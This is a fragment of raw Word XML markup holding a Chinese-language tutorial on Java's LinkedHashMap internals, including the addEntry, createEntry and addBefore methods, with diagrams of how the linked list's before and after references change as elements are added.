          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="22" name="图片 6" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 This override alters behavior of superclass put method. It causes newly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 allocated entry to get inserted at the end of the linked list and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 removes the eldest entry if appropriate.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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> addEntry(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> hash, K key, V value, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> bucketIndex)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createEntry(hash, key, value, bucketIndex);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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>// Remove eldest entry if instructed, else grow capacity if appropriate</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Entry&lt;K, V&gt; eldest = header.after;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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> (removeEldestEntry(eldest))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removeEntryForKey(eldest.key);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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>else</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> (size &gt;= threshold)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resize(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> * table.length);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 This override differs from addEntry in that it doesn't resize the</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 table or remove the eldest entry.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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> createEntry(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> hash, K key, V value, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> bucketIndex)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HashMap.Entry&lt;K, V&gt; old = table[bucketIndex];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Entry&lt;K, V&gt; e = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Entry&lt;K, V&gt;(hash, key, value, old);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table[bucketIndex] = e;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e.addBefore(header);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size++;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 Inserts this entry before the specified existing entry in the list.</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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> addBefore(Entry&lt;K, V&gt; existingEntry)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lastRenderedPageBreak/>
        <w:t>{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after = existingEntry;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before = existingEntry.before;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before.after = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this</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after.before = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> addEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法是父类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的一个方法，被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关的方法所调用即在新增元素的时候调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们通过形象的图来看一个基本的流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（从初始化到添加了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个元素过程中，各个元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>引用变化，画的有点丑，呵呵，不过意思能够表达清楚，代码的内容就不再累述了，大体和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类似！）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2085975" cy="762000"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="21" name="图片 7" descr="http://dl.iteye.com/upload/attachment/534425/53ccc9a8-fef5-36e4-8e2d-3ab7f8a3576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dl.iteye.com/upload/attachment/534425/53ccc9a8-fef5-36e4-8e2d-3ab7f8a3576e.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2085975" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2714625" cy="1457325"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="20" name="图片 8" descr="http://dl.iteye.com/upload/attachment/534427/a4a192d4-2b1c-384b-bab3-bb14851cb4c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dl.iteye.com/upload/attachment/534427/a4a192d4-2b1c-384b-bab3-bb14851cb4c2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2714625" cy="1457325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5448300" cy="2076450"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 9" descr="http://dl.iteye.com/upload/attachment/534429/acdecd29-883b-3ecb-88fd-3d2bfee9afe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dl.iteye.com/upload/attachment/534429/acdecd29-883b-3ecb-88fd-3d2bfee9afe3.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5448300" cy="2076450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5800725" cy="2133600"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="18" name="图片 10" descr="http://dl.iteye.com/upload/attachment/534434/77841cab-e54a-3ba0-b5fc-fd70f427b8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dl.iteye.com/upload/attachment/534434/77841cab-e54a-3ba0-b5fc-fd70f427b844.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5800725" cy="2133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再介绍一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
